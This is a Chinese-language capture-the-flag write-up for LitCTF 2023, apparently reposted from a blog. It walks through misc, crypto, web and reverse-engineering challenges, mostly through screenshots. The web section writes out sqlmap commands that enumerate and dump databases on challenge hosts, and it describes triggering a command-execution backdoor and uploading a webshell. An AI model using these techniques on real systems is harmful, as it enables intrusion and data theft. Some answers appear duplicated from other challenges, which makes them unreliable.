LitCTF2023-wp

misc

签到

image.png
LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

What_1s_BASE (初级)

image.png
LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

Take me hand (初级)

wireshark导出HTTP包image.png
查看%5c文件得到image.pngimage.png
LitCTF{Give_y0ur_hand_to_me!!!_plz}

喜欢我的压缩包么 (初级)

爆破image.png
密码:114514image.png

这羽毛球怎么只有一半啊(恼 (初级)

拖进winhex修改高度image.pngimage.png
NSSCTF{Fl4g_0fcourse!}

404notfound (初级)

用winhex打开图片,找到flagimage.png
NSSCTF{Its_404_but_1ts_n0t_a_page}

OSINT 探姬去哪了?_1

图片SANGEL是松果酒店image.png
NSSCTF{松果酒店(郑州农业路店)}

破损的图片(初级)

image.pngimage.pngNSSCTF{May you, the beauty of this world, always shine.}

OSINT 探姬去哪了?_2

image.png
LitCTF{漫香音乐酒吧(农科路店)}

扫描二维码关注公众号,回复: 15543712 查看本文章

OSINT 这是什么地方?!

image.pngimage.png008CCBE17C14F817C8B0E7810BF11AB8.JPG0FA51473A04B283B9C051FCB82C53A1F.JPGE1D16B9DC162E5C055C5261377E12568.JPG34CC2D52BF3C11495902A34426F6FACF.JPG NSSCTF{陕西有色榆林新材料集团}

问卷

image.png
访问链接image.png
问卷还是要写的NSSCTF{LitCTF_2023?It's_time_to_g0to_zh1hu!!!}

CRYPTO

Hex?Hex!(初级)

image.png
LitCTF{tai111coollaaa!}

梦想是红色的 (初级)

image.png
LitCTF{为之则易,不为则难}

家人们!谁懂啊,RSA签到都不会 (初级)

https://github.com/spmonkey/Crypto 直接工具直接解密即可image.pngLitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}

web

我Flag呢?

查看源码直接搜索flagimage.pngNSSCTF{eefa833d-4d82-41c2-b79b-4da7e54ca07b}

Follow me and hack me

image.pngimage.png
NSSCTF{078766f8-02c2-4a80-93b4-3aa6f9ee8a38}

导弹迷踪

按f12,在game.js文件中,找到flagimage.png

PHP是世界上最好的语言

image.png
使用dirsearch扫描网站目录查看vim缓存文件
dirsearch -u urlimage.png
vim -r 文件名恢复文件image.png
可以发现源码存在rce
代码逻辑很简单,第一个参数password,密码为Give_Me_Your_Flag需要base64加密,后面就是一个参数为cmd的命令执行&结合起来执行即可
构造payloadimage.png
没想到flag就在根目录NSSCTF{a8bae2d9-eb07-4375-9e03-27b9a23e23f2}

Vim yyds

使用dirsearch扫描网站目录查看vim缓存文件
dirsearch -u urlimage.png
vim -r 文件名恢复文件image.png
可以发现源码存在rce
代码逻辑很简单,第一个参数password,密码为Give_Me_Your_Flag需要base64加密,后面就是一个参数为cmd的命令执行&结合起来执行即可
构造payloadimage.png
没想到flag就在根目录NSSCTF{a8bae2d9-eb07-4375-9e03-27b9a23e23f2}

这是什么?SQL !注一下 !

image.pngimage.png
get传参,参数是id直接上sqlmapsqlmap -u "[http://node5.anna.nssctf.cn:28124/?id=1"](http://node5.anna.nssctf.cn:28124/?id=1") --current-db --dump --batch
--current-db可以查看网站使用的当前数据库列举出来,发现网站所用数据库为ctf且无什么内容,一段flagimage.png
继续爆破sqlmap -u "[http://node5.anna.nssctf.cn:28124/?id=1"](http://node5.anna.nssctf.cn:28124/?id=1") -dbsimage.png
爆出数据库慢慢查查看第二个数据库,ctftrainingsqlmap -u "[http://node5.anna.nssctf.cn:28124/?id=1"](http://node5.anna.nssctf.cn:28124/?id=1") -D ctftraining -tablesimage.png
查看flag表中的数据sqlmap -u "[http://node6.anna.nssctf.cn:28695/?id=1"](http://node6.anna.nssctf.cn:28695/?id=1") -D ctftraining -T flag --columnsimage.png
继续读字段sqlmap -u "[http://node6.anna.nssctf.cn:28695/](http://node6.anna.nssctf.cn:28695/)?id=1" -D ctftraining -T flag -C flag --dump image.pngNSSCTF{a6a7cecb-abf0-4a51-b666-a767681ff097}

作业管理系统

访问页面image.png6ccdcfc1ed9f777c164b38d7c3a38f2.png
源码发现账号密码
账号:admin
密码:adminimage.png
发现上传文件,直接上传webshell,发现没有任何限制,蚁剑连接image.png
即可获得flagNSSCTF{5f39bd8e-3f57-4253-8902-014942ef8076}

RE

世界上最棒的程序员

用文本工具打开exe,直接搜索flagimage.pngLitCTF{I_am_the_best_programmer_ever}

猜你喜欢

转载自blog.csdn.net/cfy2401926342/article/details/131468394